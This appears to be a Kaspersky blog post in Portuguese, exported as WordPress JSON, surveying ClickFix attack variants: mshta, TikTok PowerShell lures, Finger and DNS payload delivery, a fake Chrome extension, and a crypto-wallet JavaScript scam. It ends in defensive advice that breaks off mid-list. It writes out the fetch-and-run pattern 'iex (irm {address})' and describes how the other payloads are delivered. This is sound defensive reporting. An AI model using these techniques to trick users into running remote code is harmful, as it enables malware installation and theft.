{"id":24806,"date":"2026-03-12T09:50:12","date_gmt":"2026-03-12T12:50:12","guid":{"rendered":"https:\/\/www.kaspersky.com.br\/blog\/?p=24806"},"modified":"2026-03-12T09:49:52","modified_gmt":"2026-03-12T12:49:52","slug":"clickfix-attack-variations","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com.br\/blog\/clickfix-attack-variations\/24806\/","title":{"rendered":"Varia\u00e7\u00f5es do ClickFix"},"content":{"rendered":"

H\u00e1 cerca de um ano, publicamos uma postagem<\/a> sobre a t\u00e9cnica ClickFix, que estava ganhando popularidade entre os invasores. A ess\u00eancia dos ataques usando o ClickFix \u00e9 convencer a v\u00edtima, sob v\u00e1rios pretextos, a executar um comando malicioso em seu computador. Ou seja, do ponto de vista das solu\u00e7\u00f5es de seguran\u00e7a cibern\u00e9tica, ele \u00e9 executado em nome do usu\u00e1rio ativo e com seus privil\u00e9gios.<\/p>\n

Nos primeiros usos dessa t\u00e9cnica, os cibercriminosos tentavam convencer as v\u00edtimas de que elas precisavam executar um comando para corrigir algum problema ou passar por um captcha<\/a> e, na grande maioria dos casos, o comando malicioso era um script do PowerShell. No entanto, desde ent\u00e3o, os invasores criaram uma s\u00e9rie de novos truques sobre os quais os usu\u00e1rios devem ser avisados, bem como uma s\u00e9rie de novas variantes de entrega de carga maliciosa, que tamb\u00e9m merecem aten\u00e7\u00e3o.<\/p>\n

Uso de mshta.exe<\/em><\/h2>\n

No ano passado, os especialistas da Microsoft publicaram um relat\u00f3rio<\/a> sobre ataques cibern\u00e9ticos direcionados a propriet\u00e1rios de hot\u00e9is que trabalham com a Booking.com. Os invasores enviaram notifica\u00e7\u00f5es falsas do servi\u00e7o ou e-mails fingindo ser de h\u00f3spedes chamando a aten\u00e7\u00e3o para uma avalia\u00e7\u00e3o. Em ambos os casos, o e-mail continha um link para um site imitando o site Booking.com, que pedia \u00e0 v\u00edtima para provar que n\u00e3o era um rob\u00f4 executando um c\u00f3digo pelo menu Executar.<\/p>\n

H\u00e1 duas diferen\u00e7as principais entre esse ataque e o ClickFix. Primeiro, ningu\u00e9m pede para o usu\u00e1rio copiar a string (afinal, uma string com c\u00f3digo \u00e0s vezes levanta suspeitas). Ela \u00e9 copiada para a \u00e1rea de transfer\u00eancia pelo site malicioso, provavelmente quando o usu\u00e1rio clica em uma caixa de sele\u00e7\u00e3o que imita o mecanismo reCAPTCHA. Em segundo lugar, a string maliciosa invoca o utilit\u00e1rio mshta.exe<\/em> leg\u00edtimo, que serve para executar aplicativos escritos em HTML. Ele entra em contato com o servidor dos invasores e executa a carga maliciosa.<\/p>\n

V\u00eddeo no TikTok e PowerShell com privil\u00e9gios de administrador<\/h2>\n

A BleepingComputer publicou um artigo<\/a> em outubro de 2025 sobre uma campanha que espalha malware por meio de instru\u00e7\u00f5es em v\u00eddeos do TikTok. Os pr\u00f3prios v\u00eddeos imitam tutoriais sobre como ativar software propriet\u00e1rio gratuitamente. O conselho que fornecem se resume \u00e0 necessidade de executar o PowerShell com privil\u00e9gios de administrador e, em seguida, executar o comando iex (irm {address})<\/em>. Aqui, o comando irm baixa um script malicioso de um servidor controlado por invasores e o comando iex<\/em> (Invoke-Expression) o executa. O script, por sua vez, baixa um malware infostealer para o computador da v\u00edtima.<\/p>\n

Uso do protocolo Finger<\/h2>\n

Outra variante incomum do ataque ClickFix usa<\/a> o conhecido truque do captcha, mas o script malicioso usa o antigo protocolo Finger<\/a>. O utilit\u00e1rio de mesmo nome permite que qualquer pessoa solicite dados sobre um usu\u00e1rio espec\u00edfico em um servidor remoto. Hoje, o protocolo raramente \u00e9 usado, mas ainda \u00e9 compat\u00edvel com Windows, macOS e diversos sistemas baseados em Linux.<\/p>\n

O usu\u00e1rio \u00e9 persuadido a abrir a interface da linha de comando e us\u00e1-la para executar um comando que estabelece uma conex\u00e3o pelo protocolo Finger (usando a porta TCP 79) com o servidor do invasor. O protocolo transfere apenas informa\u00e7\u00f5es de texto, mas isso \u00e9 suficiente para baixar outro script para o computador da v\u00edtima, que ent\u00e3o instala o malware.<\/p>\n

Variante CrashFix<\/h2>\n

Outra variante do ClickFix difere por usar engenharia social mais sofisticada. Ela foi usada em um ataque<\/a> a usu\u00e1rios que tentavam encontrar uma ferramenta para bloquear banners de publicidade, rastreadores, malware e outros conte\u00fados indesejados em p\u00e1ginas da web. Ao procurar uma extens\u00e3o adequada para o Google Chrome, as v\u00edtimas encontraram algo chamado NexShield \u2013 Advanced Web Guardian<\/em>, que na verdade era um clone de um software real funcional, mas que em algum momento travava o navegador e exibia uma notifica\u00e7\u00e3o falsa sobre um problema de seguran\u00e7a detectado e a necessidade de executar uma \u201cverifica\u00e7\u00e3o\u201d para corrigir o erro. Se o usu\u00e1rio concordasse, ele recebia instru\u00e7\u00f5es sobre como abrir o menu Executar e digitar um comando que a extens\u00e3o havia copiado anteriormente para a \u00e1rea de transfer\u00eancia.<\/p>\n

O comando copiava o arquivo finger.exe<\/em> conhecido para um diret\u00f3rio tempor\u00e1rio, o renomeava como ct.exe<\/em> e, em seguida, iniciava-o com o endere\u00e7o do invasor. O resto do ataque era id\u00eantico ao caso anterior. Em resposta \u00e0 solicita\u00e7\u00e3o do protocolo Finger, um script malicioso era entregue, que iniciava e instalava um trojan de acesso remoto (neste caso, ModeloRAT).<\/p>\n

Entrega de malware por consulta DNS<\/h2>\n

A equipe de Intelig\u00eancia de Amea\u00e7as da Microsoft tamb\u00e9m compartilhou<\/a> uma variante de ataque ClickFix um pouco mais complexa do que o habitual. Infelizmente, eles n\u00e3o descreveram o truque de engenharia social, mas o m\u00e9todo de entregar a carga maliciosa \u00e9 bastante interessante. Provavelmente para dificultar a detec\u00e7\u00e3o do ataque em um ambiente corporativo e prolongar a vida \u00fatil da infraestrutura maliciosa, os invasores usaram uma etapa adicional: entrar em contato com um servidor DNS controlado pelos invasores.<\/p>\n

Ou seja, depois que a v\u00edtima \u00e9 persuadida de alguma forma a copiar e executar um comando malicioso, uma solicita\u00e7\u00e3o \u00e9 enviada ao servidor DNS em nome do usu\u00e1rio por meio do utilit\u00e1rio nslookup<\/em> leg\u00edtimo, solicitando dados para o dom\u00ednio example.com<\/em>. O comando continha o endere\u00e7o de um servidor DNS espec\u00edfico controlado pelos invasores. Ele retorna uma resposta que, entre outras coisas, cont\u00e9m uma string com um script malicioso, que por sua vez baixa a carga \u00fatil final (neste ataque, ModeloRAT novamente).<\/p>\n

Isca de criptomoeda e JavaScript como carga \u00fatil<\/h2>\n

A pr\u00f3xima variante de ataque<\/a> \u00e9 interessante por sua engenharia social de v\u00e1rios est\u00e1gios. Em coment\u00e1rios no Pastebin, os invasores espalharam ativamente uma mensagem sobre uma suposta falha no servi\u00e7o de c\u00e2mbio de criptomoedas Swapzone.io<\/em>. Os propriet\u00e1rios de criptomoedas recebiam convites para visitar um site criado por fraudadores, que continha instru\u00e7\u00f5es completas sobre como explorar uma falha capaz de gerar at\u00e9 US$ 13.000 em poucos dias.<\/p>\n

As instru\u00e7\u00f5es explicavam como as falhas do servi\u00e7o podiam ser exploradas para trocar criptomoedas a uma taxa mais favor\u00e1vel. Para fazer isso, a v\u00edtima precisava abrir o site do servi\u00e7o no navegador Chrome, digitar manualmente \u201cjavascript:\u201d na barra de endere\u00e7o, colar o script JavaScript copiado do site do invasor e execut\u00e1-lo. Na realidade, \u00e9 claro, o script n\u00e3o podia afetar as taxas de c\u00e2mbio; ele simplesmente substitu\u00eda os endere\u00e7os da carteira Bitcoin e, se a v\u00edtima realmente tentasse negociar algo, transferiria os fundos para as contas dos invasores.<\/p>\n

Como proteger a sua empresa contra ataques ClickFix<\/h2>\n

Os ataques mais simples que usam a t\u00e9cnica ClickFix podem ser combatidos pelo bloqueio da combina\u00e7\u00e3o de teclas [Win] <\/strong>+ [R] <\/strong>em dispositivos de trabalho. Mas, como vemos nos exemplos listados, esse est\u00e1 longe de ser o \u00fanico tipo de ataque em que os usu\u00e1rios s\u00e3o instru\u00eddos a executar c\u00f3digo malicioso.<\/p>\n

Portanto, o principal conselho \u00e9 aumentar a conscientiza\u00e7\u00e3o em seguran\u00e7a cibern\u00e9tica dos funcion\u00e1rios. Eles devem entender claramente que, se algu\u00e9m lhes pedir para executar qualquer manipula\u00e7\u00e3o incomum no sistema e\/ou copiar e colar um c\u00f3digo em algum lugar, na maioria dos casos trata-se de um truque usado pelos cibercriminosos. O treinamento de conscientiza\u00e7\u00e3o de seguran\u00e7a pode ser organizado com a Kaspersky Automated Security Awareness Platform<\/a>.<\/p>\n

Al\u00e9m disso, para se proteger contra esses ataques cibern\u00e9ticos, recomendamos:<\/p>\n